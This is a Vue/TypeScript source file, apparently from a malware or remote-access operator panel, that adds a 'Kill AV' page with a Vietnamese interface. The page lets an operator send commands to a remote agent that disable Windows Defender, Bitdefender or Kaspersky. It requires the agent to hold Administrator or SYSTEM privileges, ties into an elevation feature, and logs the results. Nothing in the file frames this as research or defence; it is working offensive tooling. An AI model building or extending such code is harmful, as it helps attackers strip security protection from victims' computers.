<template>
  <div v-if="!privilege_loaded" class="flex flex-col gap-4"><Loading /></div>
  <template v-else-if="elevatable_action === null">
    <p class="text-error border-error/40 border p-4" role="alert">
      Thiếu quyền: agent phải có quyền Administrator hoặc SYSTEM để chạy Kill AV
      (hiện tại: {{ client_detail_store.client_detail?.privileges?.permission || "không xác định" }}).
    </p>
  </template>
  <div v-else class="flex flex-col gap-4">
    <div class="flex items-center justify-between">
      <h2 class="text-xl font-bold">Kill AV</h2>
      <div class="flex gap-2">
        <button class="btn btn-primary btn-sm" @click="open_dialog">Tạo lệnh</button>
        <button class="btn btn-outline btn-sm" :disabled="action_store.loading.get_action_history" @click="load_history">
          <i v-if="!action_store.loading.get_action_history" class="fa-solid fa-rotate-right"></i> Làm mới
        </button>
      </div>
    </div>

    <Loading v-if="action_store.loading.get_action_history" />
    <template v-else-if="action_store.total_filter > 0">
      <table class="table-pin-rows table-md mb-4 table">
        <thead>
          <tr>
            <th>Công cụ</th>
            <th>Thời gian tạo</th>
            <th>Trạng thái</th>
            <th>Kết quả</th>
          </tr>
        </thead>
        <tbody class="bg-base-200">
          <tr v-for="action in action_store.actions" :key="action.id">
            <td><div class="kbd">{{ tool_label[action.action ?? ""] ?? action.action }}</div></td>
            <td>{{ dayjs(action.created).fromNow() }}</td>
            <td><ActionStatus :status="action.status" /></td>
            <td class="max-w-xl whitespace-pre-wrap break-all">{{ action.log }}</td>
          </tr>
        </tbody>
      </table>
      <PaginationTemplate :total_pages="action_store.total_pages" />
    </template>
    <NotFound v-else />

    <dialog ref="dialog" class="modal" :aria-labelledby="`${id}-title`">
      <div class="modal-box max-h-[90dvh] overflow-y-auto rounded-none">
        <h3 :id="`${id}-title`" class="mb-4 text-lg font-bold">Vô hiệu hóa phần mềm diệt virus</h3>
        <fieldset class="space-y-4" :disabled="submitting">
          <legend class="sr-only">Phần mềm diệt virus</legend>
          <label v-for="tool in tools" :key="tool.value" class="flex items-center gap-2 text-sm">
            <input
              v-model="type"
              type="radio"
              :name="`${id}-tool`"
              :value="tool.value"
              class="radio radio-sm radio-primary"
              @change="error = ''"
            />
            {{ tool.label }}
          </label>
        </fieldset>
        <p v-if="error" role="alert" class="text-error mt-3 text-sm">{{ error }}</p>
        <div class="modal-action">
          <button type="button" class="btn rounded-none" @click="dialog?.close()">Đóng</button>
          <button type="button" class="btn btn-primary rounded-none" :disabled="submitting" @click="submit">
            {{ submitting ? "Đang gửi…" : "Submit" }}
          </button>
        </div>
      </div>
    </dialog>
  </div>
</template>

<script setup lang="ts">
import dayjs from "dayjs";
import relativeTime from "dayjs/plugin/relativeTime";
import { computed, ref, useId } from "vue";
import { useRoute } from "vue-router";
import { toast } from "vue3-toastify";
import Loading from "@/components/LoadingTemplate.vue";
import NotFound from "@/components/NotFound.vue";
import PaginationTemplate from "@/components/PaginationTemplate.vue";
import { axios_instance } from "@/api/api";
import { AxiosError as AxiosErrorClass } from "axios";
import ActionStatus from "../ExplorerV2/ActionStatus.vue";
import { use_action } from "../ExplorerV2/useAction";
import { use_client_detail } from "../useClientDetail";

dayjs.extend(relativeTime);

// Backend: POST /api/v1/view/action/kill-av {agent_id, args, type: [kill_av_*]}
// requires an Administrator/SYSTEM agent (same gate as ElevateButton), and every
// entry shares the wire type kill_av — action.action is what selects the module.
const tools = [
  { value: "kill_av__win_def", label: "Windows Defender" },
  { value: "kill_av_bit", label: "Bitdefender" },
  { value: "kill_av_kas", label: "Kaspersky" },
] as const;
const tool_label: Record<string, string> = Object.fromEntries(
  tools.map((tool) => [tool.value, tool.label]),
);

const ELEVATE_ADMIN = "elevate_admin" as const;
const ELEVATE_SYSTEM = "elevate_system" as const;
const STANDARD = "standard user";
const ADMINISTRATOR = "administrator";

const action_store = use_action();
const client_detail_store = use_client_detail();
const route = useRoute();

// ponytail: mirrors ElevateButton's elevatable logic exactly (privilege on the agent).
type Elevatable = typeof ELEVATE_ADMIN | typeof ELEVATE_SYSTEM;
const elevatable_action = computed<Elevatable | null>(() => {
  const raw = client_detail_store.client_detail?.privileges?.permission;
  if (raw === undefined) return null;
  const current = String(raw).trim().toLowerCase();
  if (current === STANDARD) return ELEVATE_ADMIN;
  if (current === ADMINISTRATOR) return ELEVATE_SYSTEM;
  return null;
});
// Tránh nhá "Thiếu quyền" trong lúc /api/v1/view/agent/:id còn đang tải.
const privilege_loaded = computed(
  () => client_detail_store.client_detail?.privileges?.permission !== undefined,
);

const id = useId();
const type = ref<(typeof tools)[number]["value"]>("kill_av__win_def");
const error = ref("");
const submitting = ref(false);
const dialog = ref<HTMLDialogElement>();

const load_history = () =>
  action_store.get_action_history({ type: "kill_av", size: 20 }).catch((err) => toast.error(err));
void load_history();

const open_dialog = () => {
  error.value = "";
  dialog.value?.showModal();
};

const submit = async () => {
  if (submitting.value) return;
  const agent_id = route.params.client_id as string;
  if (!agent_id) {
    error.value = "Thiếu ID workstation.";
    return;
  }
  submitting.value = true;
  try {
    await axios_instance.post("/api/v1/view/action/kill-av", {
      agent_id,
      args: "kill",
      type: [type.value],
    });
    toast.success("Đã tạo lệnh Kill AV.");
    dialog.value?.close();
    void load_history();
  } catch (err) {
    error.value =
      err instanceof AxiosErrorClass && err.response?.data?.message
        ? String(err.response.data.message)
        : "Không thể tạo lệnh. Vui lòng thử lại.";
  } finally {
    submitting.value = false;
  }
};
</script>
